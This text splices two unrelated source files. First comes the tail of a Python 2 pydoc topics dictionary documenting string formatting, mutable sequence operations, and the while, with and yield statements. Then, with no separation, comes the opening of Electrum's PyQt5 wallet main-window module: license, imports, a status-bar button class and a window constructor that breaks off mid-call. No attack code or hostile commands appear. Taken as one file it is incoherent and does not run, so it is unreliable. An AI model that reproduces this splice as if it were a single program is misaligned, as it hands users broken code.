(see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n\n\nString Formatting Operations\n============================\n\nString and Unicode objects have one unique built-in operation: the "%"\noperator (modulo). This is also known as the string *formatting* or\n*interpolation* operator. Given "format % values" (where *format* is\na string or Unicode object), "%" conversion specifications in *format*\nare replaced with zero or more elements of *values*. The effect is\nsimilar to using "sprintf()" in the C language. 
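For example:\n\n >>> \'%s has %03d quote types.\' % (\'Python\', 2)\n \'Python has 002 quote types.\'\n\n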
If *format* is a\nUnicode object, or if any of the objects being converted using the\n"%s" conversion are Unicode objects, the result will also be a Unicode\nobject.\n\nIf *format* requires a single argument, *values* may be a single non-\ntuple object. [5] Otherwise, *values* must be a tuple with exactly\nthe number of items specified by the format string, or a single\nmapping object (for example, a dictionary).\n\nA conversion specifier contains two or more characters and has the\nfollowing components, which must occur in this order:\n\n1. The "\'%\'" character, which marks the start of the specifier.\n\n2. Mapping key (optional), consisting of a parenthesised sequence\n of characters (for example, "(somename)").\n\n3. Conversion flags (optional), which affect the result of some\n conversion types.\n\n4. Minimum field width (optional). If specified as an "\'*\'"\n (asterisk), the actual width is read from the next element of the\n tuple in *values*, and the object to convert comes after the\n minimum field width and optional precision.\n\n5. Precision (optional), given as a "\'.\'" (dot) followed by the\n precision. If specified as "\'*\'" (an asterisk), the actual width\n is read from the next element of the tuple in *values*, and the\n value to convert comes after the precision.\n\n6. Length modifier (optional).\n\n7. Conversion type.\n\nWhen the right argument is a dictionary (or other mapping type), then\nthe formats in the string *must* include a parenthesised mapping key\ninto that dictionary inserted immediately after the "\'%\'" character.\nThe mapping key selects the value to be formatted from the mapping.\nFor example:\n\n>>> print \'%(language)s has %(number)03d quote types.\' % \\\n... {"language": "Python", "number": 2}\nPython has 002 quote types.\n\nIn this case no "*" specifiers may occur in a format (since they\nrequire a sequential parameter list).\n\nThe conversion flag characters are:\n\n+-----------+-----------------------------------------------------------------------+\n| Flag | Meaning |\n+===========+=======================================================================+\n| "\'#\'" | The value conversion will use the "alternate form" (where defined |\n| | below). |\n+-----------+-----------------------------------------------------------------------+\n| "\'0\'" | The conversion will be zero padded for numeric values. |\n+-----------+-----------------------------------------------------------------------+\n| "\'-\'" | The converted value is left adjusted (overrides the "\'0\'" conversion |\n| | if both are given). |\n+-----------+-----------------------------------------------------------------------+\n| "\' \'" | (a space) A blank should be left before a positive number (or empty |\n| | string) produced by a signed conversion. |\n+-----------+-----------------------------------------------------------------------+\n| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will precede the conversion |\n| | (overrides a "space" flag). |\n+-----------+-----------------------------------------------------------------------+\n\nA length modifier ("h", "l", or "L") may be present, but is ignored as\nit is not necessary for Python -- so e.g. "%ld" is identical to "%d".\n\nThe conversion types are:\n\n+--------------+-------------------------------------------------------+---------+\n| Conversion | Meaning | Notes |\n+==============+=======================================================+=========+\n| "\'d\'" | Signed integer decimal. 
| |\n+--------------+-------------------------------------------------------+---------+\n| "\'i\'" | Signed integer decimal. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'o\'" | Signed octal value. | (1) |\n+--------------+-------------------------------------------------------+---------+\n| "\'u\'" | Obsolete type -- it is identical to "\'d\'". | (7) |\n+--------------+-------------------------------------------------------+---------+\n| "\'x\'" | Signed hexadecimal (lowercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'X\'" | Signed hexadecimal (uppercase). | (2) |\n+--------------+-------------------------------------------------------+---------+\n| "\'e\'" | Floating point exponential format (lowercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'E\'" | Floating point exponential format (uppercase). | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'f\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'F\'" | Floating point decimal format. | (3) |\n+--------------+-------------------------------------------------------+---------+\n| "\'g\'" | Floating point format. Uses lowercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'G\'" | Floating point format. Uses uppercase exponential | (4) |\n| | format if exponent is less than -4 or not less than | |\n| | precision, decimal format otherwise. | |\n+--------------+-------------------------------------------------------+---------+\n| "\'c\'" | Single character (accepts integer or single character | |\n| | string). | |\n+--------------+-------------------------------------------------------+---------+\n| "\'r\'" | String (converts any Python object using repr()). | (5) |\n+--------------+-------------------------------------------------------+---------+\n| "\'s\'" | String (converts any Python object using "str()"). | (6) |\n+--------------+-------------------------------------------------------+---------+\n| "\'%\'" | No argument is converted, results in a "\'%\'" | |\n| | character in the result. | |\n+--------------+-------------------------------------------------------+---------+\n\nNotes:\n\n1. The alternate form causes a leading zero ("\'0\'") to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n2. The alternate form causes a leading "\'0x\'" or "\'0X\'" (depending\n on whether the "\'x\'" or "\'X\'" format was used) to be inserted\n between left-hand padding and the formatting of the number if the\n leading character of the result is not already a zero.\n\n3. The alternate form causes the result to always contain a decimal\n point, even if no digits follow it.\n\n The precision determines the number of digits after the decimal\n point and defaults to 6.\n\n4. The alternate form causes the result to always contain a decimal\n point, and trailing zeroes are not removed as they would otherwise\n be.\n\n The precision determines the number of significant digits before\n and after the decimal point and defaults to 6.\n\n5. 
The "%r" conversion was added in Python 2.0.\n\n The precision determines the maximal number of characters used.\n\n6. If the object or format provided is a "unicode" string, the\n resulting string will also be "unicode".\n\n The precision determines the maximal number of characters used.\n\n7. See **PEP 237**.\n\nSince Python strings have an explicit length, "%s" conversions do not\nassume that "\'\\0\'" is the end of the string.\n\nChanged in version 2.7: "%f" conversions for numbers whose absolute\nvalue is over 1e50 are no longer replaced by "%g" conversions.\n\nAdditional string operations are defined in standard modules "string"\nand "re".\n\n\nXRange Type\n===========\n\nThe "xrange" type is an immutable sequence which is commonly used for\nlooping. The advantage of the "xrange" type is that an "xrange"\nobject will always take the same amount of memory, no matter the size\nof the range it represents. There are no consistent performance\nadvantages.\n\nXRange objects have very little behavior: they only support indexing,\niteration, and the "len()" function.\n\n\nMutable Sequence Types\n======================\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, 
x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. 
A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. **CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'typesseq-mutable': u'\nMutable Sequence Types\n**********************\n\nList and "bytearray" objects support additional operations that allow\nin-place modification of the object. Other mutable sequence types\n(when added to the language) should also support these operations.\nStrings and tuples are immutable sequence types: such objects cannot\nbe modified once created. The following operations are defined on\nmutable sequence types (where *x* is an arbitrary object):\n\n+--------------------------------+----------------------------------+-----------------------+\n| Operation | Result | Notes |\n+================================+==================================+=======================+\n| "s[i] = x" | item *i* of *s* is replaced by | |\n| | *x* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j] = t" | slice of *s* from *i* to *j* is | |\n| | replaced by the contents of the | |\n| | iterable *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j]" | same as "s[i:j] = []" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s[i:j:k] = t" | the elements of "s[i:j:k]" are | (1) |\n| | replaced by those of *t* | |\n+--------------------------------+----------------------------------+-----------------------+\n| "del s[i:j:k]" | removes the elements of | |\n| | "s[i:j:k]" from the list | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.append(x)" | same as "s[len(s):len(s)] = [x]" | (2) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.extend(x)" or "s += t" | for the most part the same as | (3) |\n| | "s[len(s):len(s)] = x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s *= n" | updates *s* with its contents | (11) |\n| | repeated *n* times | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.count(x)" | return number of *i*\'s for which | |\n| | "s[i] == x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.index(x[, i[, j]])" | return smallest *k* such that | (4) |\n| | "s[k] == x" and "i <= k < j" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.insert(i, x)" | same as "s[i:i] = [x]" | (5) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.pop([i])" | same as "x = s[i]; del s[i]; | (6) |\n| | return 
x" | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.remove(x)" | same as "del s[s.index(x)]" | (4) |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.reverse()" | reverses the items of *s* in | (7) |\n| | place | |\n+--------------------------------+----------------------------------+-----------------------+\n| "s.sort([cmp[, key[, | sort the items of *s* in place | (7)(8)(9)(10) |\n| reverse]]])" | | |\n+--------------------------------+----------------------------------+-----------------------+\n\nNotes:\n\n1. *t* must have the same length as the slice it is replacing.\n\n2. The C implementation of Python has historically accepted\n multiple parameters and implicitly joined them into a tuple; this\n no longer works in Python 2.0. Use of this misfeature has been\n deprecated since Python 1.4.\n\n3. *x* can be any iterable object.\n\n4. Raises "ValueError" when *x* is not found in *s*. When a\n negative index is passed as the second or third parameter to the\n "index()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, "index()" didn\'t have arguments\n for specifying start and stop positions.\n\n5. When a negative index is passed as the first parameter to the\n "insert()" method, the list length is added, as for slice indices.\n If it is still negative, it is truncated to zero, as for slice\n indices.\n\n Changed in version 2.3: Previously, all negative indices were\n truncated to zero.\n\n6. The "pop()" method\'s optional argument *i* defaults to "-1", so\n that by default the last item is removed and returned.\n\n7. The "sort()" and "reverse()" methods modify the list in place\n for economy of space when sorting or reversing a large list. To\n remind you that they operate by side effect, they don\'t return the\n sorted or reversed list.\n\n8. The "sort()" method takes optional arguments for controlling the\n comparisons.\n\n *cmp* specifies a custom comparison function of two arguments (list\n items) which should return a negative, zero or positive number\n depending on whether the first argument is considered smaller than,\n equal to, or larger than the second argument: "cmp=lambda x,y:\n cmp(x.lower(), y.lower())". The default value is "None".\n\n *key* specifies a function of one argument that is used to extract\n a comparison key from each list element: "key=str.lower". The\n default value is "None".\n\n *reverse* is a boolean value. If set to "True", then the list\n elements are sorted as if each comparison were reversed.\n\n In general, the *key* and *reverse* conversion processes are much\n faster than specifying an equivalent *cmp* function. This is\n because *cmp* is called multiple times for each list element while\n *key* and *reverse* touch each element only once. Use\n "functools.cmp_to_key()" to convert an old-style *cmp* function to\n a *key* function.\n\n Changed in version 2.3: Support for "None" as an equivalent to\n omitting *cmp* was added.\n\n Changed in version 2.4: Support for *key* and *reverse* was added.\n\n9. Starting with Python 2.3, the "sort()" method is guaranteed to\n be stable. A sort is stable if it guarantees not to change the\n relative order of elements that compare equal --- this is helpful\n for sorting in multiple passes (for example, sort by department,\n then by salary grade).\n\n10. 
**CPython implementation detail:** While a list is being\n sorted, the effect of attempting to mutate, or even inspect, the\n list is undefined. The C implementation of Python 2.3 and newer\n makes the list appear empty for the duration, and raises\n "ValueError" if it can detect that the list has been mutated\n during a sort.\n\n11. The value *n* is an integer, or an object implementing\n "__index__()". Zero and negative values of *n* clear the\n sequence. Items in the sequence are not copied; they are\n referenced multiple times, as explained for "s * n" under Sequence\n Types --- str, unicode, list, tuple, bytearray, buffer, xrange.\n', 'unary': u'\nUnary arithmetic and bitwise operations\n***************************************\n\nAll unary arithmetic and bitwise operations have the same priority:\n\n u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n\nThe unary "-" (minus) operator yields the negation of its numeric\nargument.\n\nThe unary "+" (plus) operator yields its numeric argument unchanged.\n\nThe unary "~" (invert) operator yields the bitwise inversion of its\nplain or long integer argument. The bitwise inversion of "x" is\ndefined as "-(x+1)". It only applies to integral numbers.\n\nIn all three cases, if the argument does not have the proper type, a\n"TypeError" exception is raised.\n', 'while': u'\nThe "while" statement\n*********************\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n', 'with': u'\nThe "with" statement\n********************\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". 
Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'yield': u'\nThe "yield" statement\n*********************\n\n yield_stmt ::= yield_expression\n\nThe "yield" statement is only used when defining a generator function,\nand is only used in the body of the generator function. Using a\n"yield" statement in a function definition is sufficient to cause that\ndefinition to create a generator function instead of a normal\nfunction.\n\nWhen a generator function is called, it returns an iterator known as a\ngenerator iterator, or more commonly, a generator. The body of the\ngenerator function is executed by calling the generator\'s "next()"\nmethod repeatedly until it raises an exception.\n\nWhen a "yield" statement is executed, the state of the generator is\nfrozen and the value of "expression_list" is returned to "next()"\'s\ncaller. By "frozen" we mean that all local state is retained,\nincluding the current bindings of local variables, the instruction\npointer, and the internal evaluation stack: enough information is\nsaved so that the next time "next()" is invoked, the function can\nproceed exactly as if the "yield" statement were just another external\ncall.\n\nAs of Python version 2.5, the "yield" statement is now allowed in the\n"try" clause of a "try" ... "finally" construct. If the generator is\nnot resumed before it is finalized (by reaching a zero reference count\nor by being garbage collected), the generator-iterator\'s "close()"\nmethod will be called, allowing any pending "finally" clauses to\nexecute.\n\nFor full details of "yield" semantics, refer to the Yield expressions\nsection.\n\nNote: In Python 2.2, the "yield" statement was only allowed when the\n "generators" feature has been enabled. This "__future__" import\n statement was used to enable the feature:\n\n from __future__ import generators\n\nSee also:\n\n **PEP 0255** - Simple Generators\n The proposal for adding generators and the "yield" statement to\n Python.\n\n **PEP 0342** - Coroutines via Enhanced Generators\n The proposal that, among other generator enhancements, proposed\n allowing "yield" to appear inside a "try" ... "finally" block.\n'}
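# ---------------------------------------------------------------------------
# Editor's illustrative sketch -- not part of the pydoc topic data above.
# The 'with' topic describes the context-manager protocol: __enter__() runs
# first and its return value is bound to the "as" target; __exit__() then
# receives (type, value, traceback) -- or three "None" arguments -- and can
# suppress an exception raised in the suite by returning a true value.
# The class name below is hypothetical, chosen only to demonstrate that
# protocol.

class SuppressZeroDivision(object):
    def __enter__(self):
        return self                      # bound to the "as" target, if any

    def __exit__(self, exc_type, exc_value, tb):
        # Returning True suppresses the exception; a false value re-raises it.
        return exc_type is not None and issubclass(exc_type, ZeroDivisionError)

with SuppressZeroDivision():
    1 / 0                                # suppressed; execution continues below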
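# Editor's illustrative sketch -- not part of the pydoc topic data above.
# The 'yield' topic explains that a generator's local state is "frozen" at
# each yield and restored when next() is called again.  A minimal,
# hypothetical counter shows this: the local variable n and the instruction
# pointer survive between resumptions.

def count_up(limit):
    n = 0
    while n < limit:
        yield n                          # state is frozen here
        n += 1                           # next() resumes exactly at this point

gen = count_up(3)
assert [x for x in gen] == [0, 1, 2]     # each iteration resumes the frozen body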
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional

from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
                             QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
                             QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
                             QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
                             QShortcut, QMainWindow, QCompleter, QInputDialog,
                             QWidget, QMenu, QSizePolicy, QStatusBar)

import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin,
                      commands, coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
                           format_satoshis_plain, NotEnoughFunds, UserCancelled,
                           NoDynamicFeeEstimates, profiler,
                           export_meta, import_meta, bh2u, bfh, InvalidPassword,
                           base_units, base_units_list, base_unit_name_to_decimal_point,
                           decimal_point_to_base_unit_name, quantize_feerate,
                           UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
                           get_new_wallet_name, send_exception_to_crash_reporter,
                           InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
                             sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID

from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
                   WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
                   OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
                   CloseButton, HelpButton, MessageBoxMixin, EnterButton,
                   expiration_values, ButtonsLineEdit, CopyCloseButton,
                   import_meta_gui, export_meta_gui,
                   filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread


class StatusBarButton(QPushButton):
    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        if e.key() == Qt.Key_Return:
            self.func()


class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):

    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    new_fx_quotes_signal = pyqtSignal()
    new_fx_history_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()

    def __init__(self, gui_object, wallet: Abstract_Wallet):
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        assert wallet, "no wallet"
        self.wallet = wallet
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.invoices = wallet.invoices
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.require_fee_update = False
        self.tl_windows = []
        self.tx_external_keypairs = {}
        Logger.__init__(self)

        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0

        self.create_status_bar()
        self.need_update = threading.Event()

        self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
        try:
            decimal_point_to_base_unit_name(self.decimal_point)
        except UnknownBaseUnit:
            self.decimal_point = DECIMAL_POINT_DEFAULT
        self.num_zeros = int(config.get('num_zeros', 0))

        self.completions = QStringListModel()

        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

        def add_optional_tab(tabs, tab, icon, description, name):
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))

        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs,
